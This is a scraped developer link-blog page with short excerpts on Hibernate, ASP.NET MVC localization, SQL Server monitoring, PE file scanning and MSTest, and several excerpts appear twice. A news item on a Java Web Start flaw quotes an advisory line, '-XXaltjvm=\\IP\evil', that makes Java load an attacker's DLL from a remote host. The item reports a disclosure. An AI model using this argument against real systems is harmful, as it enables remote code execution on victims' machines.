slowed down while the allocation system does round-robin allocation. Read more: In recovery, DBA myth a day list
Debugging Hibernate Generated SQL
Posted by
jasper22
at
10:56
|
In this article, I will explain how to debug Hibernate’s generated SQL so that unexpected query results be traced faster either to a faulty dataset or a bug in the query.There’s no need to present Hibernate anymore. Yet, for those who lived in a cave for the past years, let’s say that Hibernate is one of the two main ORM frameworks (the second one being TopLink) that dramatically ease database access in Java. One of Hibernate’s main goal is to lessen the amount of SQL you write, to the point that in many cases, you won’t even write one line. However, chances are that one day, Hibernate’s fetching mechanism won’t get you the result you expected and the problems will begin in earnest. From that point and before further investigation, you should determine which is true: * either the initial dataset is wrong
* or the generated query is
* or both if you’re really unluckyBeing able to quickly diagnose the real cause will gain you much time. In order to do this, the greatest step will be viewing the generated SQL: if you can execute it in the right query tool, you could then compare pure SQL results to Hibernate’s results and assert the true cause. There are two solutions for viewing the SQL.
Show SQLThe first solution is the simplest one. It is part of Hibernate’s configuration and is heavily documented. Just add the following line to your hibernate.cfg.xml file:<hibernate-configuration>
<session-factory>
...
<property name="hibernate.show_sql">true</property>
</session-factory>
</hibernate-configuration>Read more: DZone
* or the generated query is
* or both if you’re really unluckyBeing able to quickly diagnose the real cause will gain you much time. In order to do this, the greatest step will be viewing the generated SQL: if you can execute it in the right query tool, you could then compare pure SQL results to Hibernate’s results and assert the true cause. There are two solutions for viewing the SQL.
Show SQLThe first solution is the simplest one. It is part of Hibernate’s configuration and is heavily documented. Just add the following line to your hibernate.cfg.xml file:<hibernate-configuration>
<session-factory>
...
<property name="hibernate.show_sql">true</property>
</session-factory>
</hibernate-configuration>Read more: DZone
Routing a localized ASP.NET MVC application
Posted by
jasper22
at
10:54
|
Localizing a general ASP.NET application is easy to implement. All we have to do is assigning a specified culture info to Thread.CurrentThread.CurrentUICulture and use resource to display the localized text. There are two common ways to do this task: Manually change CurrentUICulture in Application.BeginRequest eventThe implementation will look somthing like this: protected void Application_BeginRequest(object sender, EventArgs e)
{
var cultureName = HttpContext.Current.Request.UserLanguages[0];
Thread.CurrentThread.CurrentUICulture = new CultureInfo(cultureName);
}
Let ASP.NET set the UI culture automatically based on the values that are sent by a browser We get it by changing web.config. The configuration will look like this: <system.web>
<globalization enableClientBasedCulture="true" uiCulture="auto:en"/>
</system.web>
The problem is that culture info is stored in UserLanguages which is defined by browser. If user want to change to another language, he must go to "Internet Options" (IE for example) to change the Language Preference. This technique also has problem for search engines because a search engine can not classify two different language version. It cause our page rank won't be promoted. Generally, we solve this problem by using URL to define culture (we will call it as localized url). So, an url will be change from: http://domain/action/ to http://domain/[culture-code]/action (for example: http://domain/vi-VN/action) Then, in Application.BeginRequest event, we can change UICulture like this:
protected void Application_BeginRequest(object sender, EventArgs e)
{
var cultureName = HttpContext.Current.Request.RawUrl.SubString(1, 5); //RawUrl is "/domain/vi-VN/action"
Thread.CurrentThread.CurrentUICulture = new CultureInfo(cultureName);
}
Everthing seems to be OK until the born of ASP.NET MVC. Routing technique which is used by ASP.NET MVC framework cause problem for this localization technique because routing engine need to parse an url to create the right controller. Appending a prefix before real URL will make a wrong result for routing engine. So, we need a way to combine both of ASP.NET MVC and localized url. Read more: Codeproject
{
var cultureName = HttpContext.Current.Request.UserLanguages[0];
Thread.CurrentThread.CurrentUICulture = new CultureInfo(cultureName);
}
Let ASP.NET set the UI culture automatically based on the values that are sent by a browser We get it by changing web.config. The configuration will look like this: <system.web>
<globalization enableClientBasedCulture="true" uiCulture="auto:en"/>
</system.web>
The problem is that culture info is stored in UserLanguages which is defined by browser. If user want to change to another language, he must go to "Internet Options" (IE for example) to change the Language Preference. This technique also has problem for search engines because a search engine can not classify two different language version. It cause our page rank won't be promoted. Generally, we solve this problem by using URL to define culture (we will call it as localized url). So, an url will be change from: http://domain/action/ to http://domain/[culture-code]/action (for example: http://domain/vi-VN/action) Then, in Application.BeginRequest event, we can change UICulture like this:
protected void Application_BeginRequest(object sender, EventArgs e)
{
var cultureName = HttpContext.Current.Request.RawUrl.SubString(1, 5); //RawUrl is "/domain/vi-VN/action"
Thread.CurrentThread.CurrentUICulture = new CultureInfo(cultureName);
}
Everthing seems to be OK until the born of ASP.NET MVC. Routing technique which is used by ASP.NET MVC framework cause problem for this localization technique because routing engine need to parse an url to create the right controller. Appending a prefix before real URL will make a wrong result for routing engine. So, we need a way to combine both of ASP.NET MVC and localized url. Read more: Codeproject
Oxygene: Obscure Programming Language of the Month
Posted by
jasper22
at
10:53
|
What is Oxygene?Oxygene is a commercial programming language developed by RemObjects Software for the Microsoft .NET Framework. In 2008, RemObjects licensed its Oxygene compiler and IDE technology to Embarcadero to be used in its Delphi Prism product. You may recall that in 2008 Embarcadero purchased CodeGear, the software development tools division of Borland. Oxygene DesignThe Oxygene programming language originated from Delphi and Object Pascal, but was designed to reflect the .NET programming paradigm and produce CLR-compliant assemblies. Thus, Oxygene does not support all the language features from Object Pascal and Delphi, but it does leverage all the features and technologies provided by the .NET runtime. New language features in Oxygene 3.0 include support for parallel programming, property notifications for the Model/View/Controller design pattern, nullable expressions, and improved QA analysis tools.Oxygene History RemObjects software came from a Delphi background. In 2002, RemObjects sought to expand its developer libraries into the Microsoft .NET Framework, so naturally they considered Delphi for .NET for the job. According to the RemObjects Chief Architect, it seemed like “Borland had developed Delphi for .NET with one main goal in mind: to hide the transition from Win32 to .NET from the developers.” As a result, Delphi for .NET “introduced many Delphi-isms and Win32-isms that felt out of place and awkward in the .NET world.” (source) As a result, RemObjects chose to use C# for its .NET projects instead of Delphi. But its engineers really missed the Pascal syntax, so eventually RemObjects decided to invent a language for .NET with the Pascal syntax, and Oxygene was born. Its code name was Adrenochrome, which was later shortened to Chrome, and eventually renamed to Oxygene.
“Hello World” in Oxygene implementation class method ConsoleApp.Main;
begin
// add your own code here
Console.WriteLine('Hello World.');
end; end. Read more: DevTopics
“Hello World” in Oxygene implementation class method ConsoleApp.Main;
begin
// add your own code here
Console.WriteLine('Hello World.');
end; end. Read more: DevTopics
Cool Office Tools Now Available
Posted by
jasper22
at
10:39
|
Today we released two new tools to help users transition from Office 2003 to Office 2010. These new Silverlight based tools for Word and Excel can be found at http://office2010.microsoft.com/en-us/training/learn-where-menu-and-toolbar-commands-are-in-office-2010-HA101794130.aspx#_Toc256784678 with more coming for the other Office apps soon. Office 2007 users can find similar tools at: http://office.microsoft.com/en-gb/training/HA102295841033.aspx
All a user needs to do is click the menu option in an Office 2003 like interface and it will show you where to find that in Office 2010. Pretty slick! Read more: ISV Developer Community
All a user needs to do is click the menu option in an Office 2003 like interface and it will show you where to find that in Office 2010. Pretty slick! Read more: ISV Developer Community
PreEmptive Solutions Runtime Intelligence API
Posted by
jasper22
at
10:38
|
The Runtime Intelligence API library and samples provided by PreEmptive Solutions.Read more: Codeplex
Gear6's Memcached Adds the Best of Both Worlds: MySQL and NoSQL
Posted by
jasper22
at
10:37
|
One technology that continues to push the limits of data caching and massive web persistence is Gear6's Web Caching Server. Think of Gear6 Web Cache as a Memcached distribution on steroids. It can run in the datacenter or the cloud (EC2, GoGrid) while reducing latency and increasing application performance for large Web 2.0 properties. Today, Gear6 announces the completion of a whole new layer of persistence in their Web Cache solution. DZone spoke with Joaquin Ruiz, the VP of Products at Gear6, and Mark Atwood, the Director of Community Development, about the new capabilities in Web Cache. Redis Integration
Gear6's focus was initially on expanding the capabilities of Memcached and its ability to quickly onboard and manage dynamic data. In their research of modern web architectures, Joaquin Ruiz said Gear6 had found many web developers who wanted to persist their mountains of unstructured data in their natural form, instead of force fitting it into an RDBMS. Persistence was especially important with ad-driven sites, said Ruiz. "They were storing hundreds of millions of cookies and they didn't want to instantiate a SQL-driven data structure behind that," said Ruiz Now Gear6 has shifted its focus towards accelerating structured MySQL data sets in their Memcached server and deploying a NoSQL architecture. Today's release of Gear6 Web Cache integrates their Memcached interface with operational query capabilities and a NoSQL backend. Gear6 decided to use the key-value store Redis because it already had traction among NoSQL users. Mark Atwood said that Gear6 chose a key-value store (as opposed to a document-store or graph database) because it is simple work with. "Cassandra and CouchDB are very usable and useful, but they're not as straightforward as a key-value store," said Atwood. Gear6 wanted a technology that developers from many different backgrounds could pick up and work with. Read more: DZone
Gear6's focus was initially on expanding the capabilities of Memcached and its ability to quickly onboard and manage dynamic data. In their research of modern web architectures, Joaquin Ruiz said Gear6 had found many web developers who wanted to persist their mountains of unstructured data in their natural form, instead of force fitting it into an RDBMS. Persistence was especially important with ad-driven sites, said Ruiz. "They were storing hundreds of millions of cookies and they didn't want to instantiate a SQL-driven data structure behind that," said Ruiz Now Gear6 has shifted its focus towards accelerating structured MySQL data sets in their Memcached server and deploying a NoSQL architecture. Today's release of Gear6 Web Cache integrates their Memcached interface with operational query capabilities and a NoSQL backend. Gear6 decided to use the key-value store Redis because it already had traction among NoSQL users. Mark Atwood said that Gear6 chose a key-value store (as opposed to a document-store or graph database) because it is simple work with. "Cassandra and CouchDB are very usable and useful, but they're not as straightforward as a key-value store," said Atwood. Gear6 wanted a technology that developers from many different backgrounds could pick up and work with. Read more: DZone
Introducing sys.dm_io_virtual_file_stats
Posted by
jasper22
at
10:30
|
One of the tasks that every SQL Server database administrator for ENOVIA V6 needs to accomplish is the performance monitoring of database data and log files. Often, a DBA needs to understand the performance of their disk I/O and needs something that can break down the disk I/O requests for them. SQL Server 2005 introduced a perfect little dynamic management view that can help you understand the disk I/O requests made through your database by watching these requests at the file level.
How Do I Use This Dynamic Management View?The sys.dm_io_virtual_file_stats dynamic management view is very easy to use. It takes two parameters: database_id and file_id. To see all database and all files, simply execute the dynamic management view with NULL parameters. The only hard thing to understand about this dynamic management view is that the information contained in the dynamic management view has been accumulating since the last time SQL Server was started. This means that if your instance of SQL Server was started five months ago and a large data load or deletion took place on a database file four months ago that caused disk issues, you will still see the information today. To overcome this cumulative effect, you will need to capture a baseline that will include all previous information and then capture the dynamic management view again on a periodic basis. Once you start capturing the dynamic management view again, simply take the differences to determine what disk I/O has taken place since the baseline or since the last capture. Capturing the information from is dynamic management view is simple enough. The following script creates an audit table and a job that captures the dynamic management view information on a periodic basis. You can then use this audit table to report on your disk I/O usage. USE master
GOBEGIN TRY
DROP TABLE file_stats
END TRY
BEGIN CATCH
END CATCH
GOCREATE TABLE file_stats
(
instance_name VARCHAR(30)
,database_name VARCHAR(255)
,file_id BIGINT
,num_of_reads BIGINT
,num_of_bytes_read BIGINT
,io_stall_read_ms BIGINT
,num_of_writes BIGINT
,num_of_bytes_written BIGINT
,io_stall_write_ms BIGINT
,io_stall BIGINT
,size_on_disk_bytes BIGINT
,insert_date DATETIME DEFAULT GETDATE()
)/*This script goes into a job that executes once an hour
INSERT INTO file_stats (instance_name,database_name,file_id,
num_of_reads,num_of_bytes_read,io_stall_read_ms,num_of_writes,
num_of_bytes_written,io_stall_write_ms,io_stall,
size_on_disk_bytes)
SELECT @@SERVERNAME,DB_NAME(database_id),file_id,num_of_reads,
num_of_bytes_read,io_stall_read_ms
,num_of_writes,num_of_bytes_written,io_stall_write_ms,
io_stall,size_on_disk_bytes
FROM sys.dm_io_virtual_file_stats(NULL,NULL)
*/
USE [msdb]
GO
/****** Object: Job [File Stats collection]
Script Date: 09/03/2009 12:24:01 ******/
IF EXISTS (SELECT job_id FROM msdb.dbo.sysjobs_view
WHERE name = N'File Stats collection')
EXEC msdb.dbo.sp_delete_job
@job_name = N'File Stats collection', @delete_unused_schedule=1
go/****** Object: Job [File Stats collection]
Script Date: 09/03/2009 14:53:36 ******/
BEGIN TRANSACTION
DECLARE @ReturnCode INT
SELECT @ReturnCode = 0
/****** Object: JobCategory [[Uncategorized (Local)]]]
Script Date: 09/03/2009 14:53:36 ******/
IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories
WHERE name=N'[Uncategorized (Local)]' AND category_class=1)
BEGIN
EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB',
@type=N'LOCAL', @name=N'[Uncategorized (Local)]'
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback END
Read more: Dassault Systèmes ENOVIA V6 on SQL Server
How Do I Use This Dynamic Management View?The sys.dm_io_virtual_file_stats dynamic management view is very easy to use. It takes two parameters: database_id and file_id. To see all database and all files, simply execute the dynamic management view with NULL parameters. The only hard thing to understand about this dynamic management view is that the information contained in the dynamic management view has been accumulating since the last time SQL Server was started. This means that if your instance of SQL Server was started five months ago and a large data load or deletion took place on a database file four months ago that caused disk issues, you will still see the information today. To overcome this cumulative effect, you will need to capture a baseline that will include all previous information and then capture the dynamic management view again on a periodic basis. Once you start capturing the dynamic management view again, simply take the differences to determine what disk I/O has taken place since the baseline or since the last capture. Capturing the information from is dynamic management view is simple enough. The following script creates an audit table and a job that captures the dynamic management view information on a periodic basis. You can then use this audit table to report on your disk I/O usage. USE master
GOBEGIN TRY
DROP TABLE file_stats
END TRY
BEGIN CATCH
END CATCH
GOCREATE TABLE file_stats
(
instance_name VARCHAR(30)
,database_name VARCHAR(255)
,file_id BIGINT
,num_of_reads BIGINT
,num_of_bytes_read BIGINT
,io_stall_read_ms BIGINT
,num_of_writes BIGINT
,num_of_bytes_written BIGINT
,io_stall_write_ms BIGINT
,io_stall BIGINT
,size_on_disk_bytes BIGINT
,insert_date DATETIME DEFAULT GETDATE()
)/*This script goes into a job that executes once an hour
INSERT INTO file_stats (instance_name,database_name,file_id,
num_of_reads,num_of_bytes_read,io_stall_read_ms,num_of_writes,
num_of_bytes_written,io_stall_write_ms,io_stall,
size_on_disk_bytes)
SELECT @@SERVERNAME,DB_NAME(database_id),file_id,num_of_reads,
num_of_bytes_read,io_stall_read_ms
,num_of_writes,num_of_bytes_written,io_stall_write_ms,
io_stall,size_on_disk_bytes
FROM sys.dm_io_virtual_file_stats(NULL,NULL)
*/
USE [msdb]
GO
/****** Object: Job [File Stats collection]
Script Date: 09/03/2009 12:24:01 ******/
IF EXISTS (SELECT job_id FROM msdb.dbo.sysjobs_view
WHERE name = N'File Stats collection')
EXEC msdb.dbo.sp_delete_job
@job_name = N'File Stats collection', @delete_unused_schedule=1
go/****** Object: Job [File Stats collection]
Script Date: 09/03/2009 14:53:36 ******/
BEGIN TRANSACTION
DECLARE @ReturnCode INT
SELECT @ReturnCode = 0
/****** Object: JobCategory [[Uncategorized (Local)]]]
Script Date: 09/03/2009 14:53:36 ******/
IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories
WHERE name=N'[Uncategorized (Local)]' AND category_class=1)
BEGIN
EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB',
@type=N'LOCAL', @name=N'[Uncategorized (Local)]'
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback END
Read more: Dassault Systèmes ENOVIA V6 on SQL Server
IronBrainFuck, SimpleBrainFuck
Posted by
jasper22
at
10:28
|
IronBrainFuck and SimpleBrainFuck makes it easier for BrainFuck programmers to develop BrainFuck-compatible programs. It's developed in C# with using GPPG.Read more: Codeplex
April 2010 Security Release ISO Image
Posted by
jasper22
at
10:27
|
This DVD5 ISO image file contains the security updates for Windows released on Windows Update on April 13th, 2010. The image does not contain security updates for other Microsoft products. This DVD5 ISO image is intended for administrators that need to download multiple individual language versions of each security update and that do not use an automated solution such as Windows Server Update Services (WSUS). You can use this ISO image to download multiple updates in all languages at the same time. Important: Be sure to check the individual security bulletins at http://www.microsoft.com/technet/security prior to deployment of these updates to ensure that the files have not been updated at a later date. Read more: MS Download
How to implement UI testing without shooting yourself in the foot
Posted by
jasper22
at
10:26
|
I’m currently interviewing lots of teams that have implemented acceptance testing for my new book. A majority of those interviewed so far have at some point shot themselves in the foot with UI test automation. After speaking to several people who are about to do exactly that at the Agile Acceptance Testing Days in Belgium a few weeks ago, I’d like to present what I consider a very good practice for how to do UI test automation efficiently. I’ve written against UI test automation several times so far, so I won’t repeat myself. However, many teams I interviewed seem to prefer UI level automation, or think that such level of testing is necessary to prove the required business functionality. Almost all of them have realised six to nine months after starting this effort that the cost of maintaining UI level tests is higher than the benefit they bring. Many have thrown away the tests at that point and effectively lost all the effort they put into them. If you have to do UI test automation (which I’d challenge in the first place), here is how do go about doing it so that the cost of maintenance doesn’t kill you later. Three levels of UI test automationA very good idea when designing UI level functional tests is to think about describing the test and the automation at these three levels: * Business rule/functionality level: what is this test demonstrating or exercising. For example: Free delivery is offered to customers who order two or more books.
* User interface workflow level: what does a user have to do to exercise the functionality through the UI, on a higher activity level. For example, put two books in a shopping cart, enter address details, verify that delivery options include free delivery.
* Technical activity level: what are the technical steps required to exercise the functionality. For example, open the shop homepage, log in with “testuser” and “testpassword”, go to the “/book” page, click on the first image with the “book” CSS class, wait for page to load, click on the “Buy now” link… and so on. Read more: Gojko Adzic
* User interface workflow level: what does a user have to do to exercise the functionality through the UI, on a higher activity level. For example, put two books in a shopping cart, enter address details, verify that delivery options include free delivery.
* Technical activity level: what are the technical steps required to exercise the functionality. For example, open the shop homepage, log in with “testuser” and “testpassword”, go to the “/book” page, click on the first image with the “book” CSS class, wait for page to load, click on the “Buy now” link… and so on. Read more: Gojko Adzic
Visual Basic Language Specification 10.0
Posted by
jasper22
at
10:25
|
The Visual Basic Language Specification provides a complete description of the Visual Basic language 10.0.Read more: MS Download
Patterns and Practices for parallel programming in C++
Posted by
jasper22
at
10:24
|
This document provides a detailed exploration of common patterns of parallelism and how they can be expressed with the Parallel Patterns Library, the Asynchronous Agents Library, and the Concurrency Runtime within Visual Studio 2010. This includes a discussion of best practices around the use of these libraries as well as cautions around practices yielding less than optimal behavior. Read more: MS Download
A Number of Reusable PE File Format Scanning Functions
Posted by
jasper22
at
10:24
|
This article accompanies a number of command line sample applications that wrap some common code of mine. This common code can be used to extract various information from PE files. The four samples are named bitness, pefileuses, dotnetsearch and pdbget. bitness expects a file name as the command line parameter and will tell you if the file passed as an argument is a 32 bit or a 64 bit PE file. It wraps the following common code functions:BOOL IsFile64BitPEFileW(LPCWSTR szFile, PBOOL pbIs64Bits);
BOOL IsFile64BitPEFileA(LPCSTR szFile, PBOOL pbIs64Bits);The parameters should be pretty self-explanatory. If the function succeeds, it returns a non-zero value. If it fails, the return value is FALSE and extended error information is available via GetLastError. In case of success, the out-Parameter pbIs64Bits will contain a non-zero value if the PE file passed as parameter szFile is 64 bits. pefileuses is meant to determine if a given PE file links against a certain DLL or uses a function from a given DLL. It expects 3 command line parameters and optionally a fourth parameter. The first parameter is a number between zero and 2. This number determines whether the import table or the table for delayloaded functions should be scanned or both. Passing "0" means, both tables are scanned. Passing "1" means, only the import table, passing "2" means, only the table for delayloads are scanned. The second parameter is the PE file to be scanned. The third parameter denotes the DLL name that the tables should be scanned for. Finally the fourth parameter is an optional function name. The application will print on stdout whether or not the specified binary links against the given DLL or even uses the optional function name. This tool wraps the following common code functions: BOOL __stdcall PeFileUsesImportA(LPCSTR szPeFile, LPCSTR szDllName,
LPCSTR szFunction,
PBOOL pbUse, DWORD dwFlags);
BOOL __stdcall PeFileUsesImportW(LPCWSTR szPeFile, LPCWSTR szDllName,
LPCWSTR szFunction, PBOOL pbUse,
DWORD dwFlags);The flags to be passed for this function are those that are passed as the first parameter to pefiluses.exe and are defined as such: #define PUI_USE_IMPORT_ONLY 0x1
#define PUI_USE_DELAYLOAD_ONLY 0x2Passing 0L as the dwFlags parameter scans both tables as described above. The other parameters should be pretty self-explanatory. If the function succeeds, it returns a non-zero value. If it fails, the return value is FALSE and extended error information is available via GetLastError. dotnetsearch is a tool to scan an entire directory tree and evaluate each DLL and EXE file found, whether it is a .NET binary.Read more: Codeproject
BOOL IsFile64BitPEFileA(LPCSTR szFile, PBOOL pbIs64Bits);The parameters should be pretty self-explanatory. If the function succeeds, it returns a non-zero value. If it fails, the return value is FALSE and extended error information is available via GetLastError. In case of success, the out-Parameter pbIs64Bits will contain a non-zero value if the PE file passed as parameter szFile is 64 bits. pefileuses is meant to determine if a given PE file links against a certain DLL or uses a function from a given DLL. It expects 3 command line parameters and optionally a fourth parameter. The first parameter is a number between zero and 2. This number determines whether the import table or the table for delayloaded functions should be scanned or both. Passing "0" means, both tables are scanned. Passing "1" means, only the import table, passing "2" means, only the table for delayloads are scanned. The second parameter is the PE file to be scanned. The third parameter denotes the DLL name that the tables should be scanned for. Finally the fourth parameter is an optional function name. The application will print on stdout whether or not the specified binary links against the given DLL or even uses the optional function name. This tool wraps the following common code functions: BOOL __stdcall PeFileUsesImportA(LPCSTR szPeFile, LPCSTR szDllName,
LPCSTR szFunction,
PBOOL pbUse, DWORD dwFlags);
BOOL __stdcall PeFileUsesImportW(LPCWSTR szPeFile, LPCWSTR szDllName,
LPCWSTR szFunction, PBOOL pbUse,
DWORD dwFlags);The flags to be passed for this function are those that are passed as the first parameter to pefiluses.exe and are defined as such: #define PUI_USE_IMPORT_ONLY 0x1
#define PUI_USE_DELAYLOAD_ONLY 0x2Passing 0L as the dwFlags parameter scans both tables as described above. The other parameters should be pretty self-explanatory. If the function succeeds, it returns a non-zero value. If it fails, the return value is FALSE and extended error information is available via GetLastError. dotnetsearch is a tool to scan an entire directory tree and evaluate each DLL and EXE file found, whether it is a .NET binary.Read more: Codeproject
Why support more? The story of MSTest…
Posted by
jasper22
at
09:44
|
With the new Visual Studio comes another version of Microsoft’s unit testing framework. This is Microsoft’s take on how unit testing should be done and they got a few things right – as always it’s fully integrated with Visual Studio, and with the new version comes a two exciting new features: 1. Run tests as 64 bit process – at last I’m able to test that my code works in x64 as well
2. Parallel execution – run your test suite in half/quarter of the time!Yet given a choice I still prefer to work with NUnit, and I have a few good reasons – the last strew was Microsoft’s decision not to support multi targeting of the test framework.
What does it meansNot supporting multi-targeting means that once you’ve used VS2010 to run your tests they would automatically be converted to .NET 4 which means that you won’t be able to run them using older versions of Visual Studio – want to read more have a look at this bug report turned feature. In one of the projects I work on we need to be able to run the same test suite on VS2008 and VS2010 – but we just can’t, we need to maintain two projects just to be able to run the same tests.So what? Although this is not such a big deal it seems to me that similar decisions can be found on every step MSTest has done on the road. For example ExpectedException not being able to verify exception message – by design, but still have a message property used for “informative purposes”. Why put a property I’m used to from other frameworks and change the way it work - that’s just confusing. And not to mention the fact that from time to time I get an bonus – instead of running just the test in a specific context all of my tests are run. Read more: Helper Code
2. Parallel execution – run your test suite in half/quarter of the time!Yet given a choice I still prefer to work with NUnit, and I have a few good reasons – the last strew was Microsoft’s decision not to support multi targeting of the test framework.
What does it meansNot supporting multi-targeting means that once you’ve used VS2010 to run your tests they would automatically be converted to .NET 4 which means that you won’t be able to run them using older versions of Visual Studio – want to read more have a look at this bug report turned feature. In one of the projects I work on we need to be able to run the same test suite on VS2008 and VS2010 – but we just can’t, we need to maintain two projects just to be able to run the same tests.So what? Although this is not such a big deal it seems to me that similar decisions can be found on every step MSTest has done on the road. For example ExpectedException not being able to verify exception message – by design, but still have a message property used for “informative purposes”. Why put a property I’m used to from other frameworks and change the way it work - that’s just confusing. And not to mention the fact that from time to time I get an bonus – instead of running just the test in a specific context all of my tests are run. Read more: Helper Code
IBM Patents Optimization
Posted by
jasper22
at
09:17
|
IBM appears to want to patent optimizing programs by trial and error, which in the history of programming has, of course, never been done. Certainly, all my optimizations have been the result of good planning. Well done IBM for coming up with this clever idea. What is claimed is: 'A method for developing a computer program product, the method comprising: evaluating one or more refactoring actions to determine a performance attribute; associating the performance attribute with a refactoring action used in computer code; and undoing the refactoring action of the computer code based on the performance attribute. The method of claim 1 wherein the undoing refactoring is performed when the performance attribute indicates a negative performance effect of the computer code. Read more: Slashdot
Block by country
Getting visitors you really don't want to have on your site?You can now block them easily with our free blocking service. Simply select the countries you want to block from your website and press the "Go" button. Following, in step 3, .htaccess information is generated for you. Copy and past this generated code into your .htaccess document and visitors from the selected country will not be able to access your website. Read more: Block a country
Review of Adobe Creative Suite 5
Posted by
jasper22
at
13:52
|
Adobe today updated its Creative Suite software to version 5, and PC Pro has an absolutely massive collection of reviews. Along with an overview of the entire suite, from Design to Web to Production bundles, every individual component gets the full in-depth treatment. It includes video demonstrations of Photoshop CS5's fabulous Content-Aware fill trick and new Puppet Warp function; a long-awaited step up to 64-bit for Premiere Pro CS5; and big updates to Dreamweaver CS5, After Effects CS5, and the rest. Read more: Slashdot
Serious New Java Flaw Affects All Current Versions of Windows
Posted by
jasper22
at
13:45
|
There is a serious vulnerability in Java that leaves users running any of the current versions of Windows open to simple Web-based attacks that could lead to a complete compromise of the affected system. Two separate researchers released information on the vulnerability on Friday, saying that it has been present in Java for years. The problem lies in the Java Web Start framework, a technology that Sun Microsystems developed to enable the simplified deployment of Java applications. In essence, the JavaWS technology fails to validate parameters passed to it from the command line, and attackers can control those parameters using specific HTML tags on a Web page, researcher Ruben Santamarta said in an advisory posted Friday morning. Tavis Ormandy posted an advisory about the same bug to the Full Disclosure mailing list on Friday as well. Ormandy said in his advisory that disabling the Java plugin is not enough to prevent exploitation, because the vulnerable component is installed separately. In short, if you have a recent version of Java running on a Windows machine, you're affected by this flaw."Java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...," Santamarta said in his advisory. Because the JavaWS technology is included in the Java Runtime Environment, which is used by all of the major browsers, the vulnerability affects all of these applications, including Firefox, Internet Explorer and Chrome, on all versions of Windows from 2000 through Windows 7, Santamarta said. Browsers running on Apple's Mac OS X are not vulnerable. Read more: threat post
Daily Dose - Novell Keeps Unix Copyrights; Linux is Safe
Posted by
jasper22
at
11:04
|
A US federal judge ruled on Tuesday that Novell owns the Unix copyrights, and not SCO. In the 7-year court battle, SCO claimed that copyrights transferred from their predecessor, the Santa Cruz Operation, to them. In the court ruling, the judge said that the copyrights never transferred to the Santa Cruz Operation in the first place. Tuesday's ruling was a key victory for IBM, who would have faced a multibillion dollar lawsuit had SCO won, and for Linux users, who could have been subject to fees if SCO had gotten the copyrights. SCO's open source enemies will be glad to know that the long trial has depleted the company's resources.l They are currently under bankruptcy court protection and this recent legal defeat could be the final nail in the coffin. US Cybersecurity Act "Kill Switch" Removal Questioned
In August, the US Cybersecurity Bill was met with harsh criticicsm because it allowed the President to shut down internet traffic by seizing private networks. The new draft, which passed last week, has removed the explicit "kill switch" language from the bill, but Donny Shaw's blog has led many to believe that the President would still possess "kill switch" power under the new bill. Shaw says that the language is still vague, and does not limit what the President can do in an "emergency response and restoration." This is a plan (replacing the "kill switch") that the President would develop by collaborating with government agencies and private industries. A cybersecurity emergency response may be declared "in the event of an immediate threat to strategic national interests involving compromised Federal Government or United States critical infrastructure information systems." This seems to indicate that the President would only be able to declare an emergency if there were a cyber threat to US critical systems. It's unlikely that we'll see the government shutting down newspapers or any other subversive websites anytime soon. Read more: DZone
In August, the US Cybersecurity Bill was met with harsh criticicsm because it allowed the President to shut down internet traffic by seizing private networks. The new draft, which passed last week, has removed the explicit "kill switch" language from the bill, but Donny Shaw's blog has led many to believe that the President would still possess "kill switch" power under the new bill. Shaw says that the language is still vague, and does not limit what the President can do in an "emergency response and restoration." This is a plan (replacing the "kill switch") that the President would develop by collaborating with government agencies and private industries. A cybersecurity emergency response may be declared "in the event of an immediate threat to strategic national interests involving compromised Federal Government or United States critical infrastructure information systems." This seems to indicate that the President would only be able to declare an emergency if there were a cyber threat to US critical systems. It's unlikely that we'll see the government shutting down newspapers or any other subversive websites anytime soon. Read more: DZone
Use Named Pipes and Shared Memory for inter process communication with a child process or two
Posted by
jasper22
at
11:03
|
I wanted to inject some very low impact code that would run in any “parent” process, like Notepad or Excel or Visual Studio. I wanted to have some User Interface for the data that my injected code gathered about the parent process, and that would work best in a different “child” process, preferably using WPF. In the old days, I could call a COM server to handle the job. A DLL server would be in process, but it could be made out of process by making it a COM+ application (see Blogs get 300 hits per hour: Visual FoxPro can count. and Create multiple threads from within your application). .Net Remoting seemed to be a little heavyweight for Parent->Child process communication.About 5 years ago, I wrote this: Use Named Pipes to communicate between processes or machines, so I thought I’d use a combination of Named Pipes and Shared Memory. Luckily .Net 3.5 added support for Named Pipes making the child process pretty simple. Pipes could be used to send messages, and the lion’s share of data movement could be in the Shared memory.Synchronization and lifetime management are a little tedious. We want the parent process to continue optionally if the child process terminates, but we want the child to terminate automatically when the parent terminates for any reason. Similarly, the child process should terminate if the parent has gone. This sample shows a parent process in C++ and 2 child processes in C# and VB. The parent spins off a thread to use to service incoming requests from the children. Events are used to synchronize communication. A timer in each child process fires off requests to the parent. I was using Visual Studio 2010: you can use VS 2008, but you’ll have to adjust for some of the new features I use, especially in the VB code.Start Visual Studio. File->New->Project->C++ Win32 Project->Windows Application. In the wizard, Click Add common header files for ATL Now hit F5 to build and see it execute: there’s a window and a couple menus. Now add a second EXE project to your solution: choose File->Add->New Project->VB WPF Application. (Repeat to add a 3rd project for C# !)Fiddle with the Project->Properties->Compile->Build Output path so it builds into the same folder as the parent exe (for me, it was” ..\Debug\”) Paste in the VB code below into MainWindow.Xaml.VbSomewhere inside the _tWinMain of your CPP project, add these 2 lines to instantiate a class that calls the WpfApplication as a child process, with a shared memory size of 2048 (make sure to change the name of the EXE to match your VB and C# EXEs): CreateChildProcess opCreateChildProcessCS(_T("NamedPipesCS.exe"),2048, 1);
CreateChildProcess opCreateChildProcessVB(_T("NamedPipesVB.exe"),2048, 2);
Paste the CPP code below before the _tWinMain. F5 will show both processes launched. You can alt-tab between the 2: they behave like independent processes. Try terminating one of them.
If you uncomment the MsgBox, then hit F5, you can actually use VS to attach to a child process before it does too much. Try attaching to all 3! See also:<C++ Code>// CreateChildProcess : class in parent process to instantiate and communicate with a child process
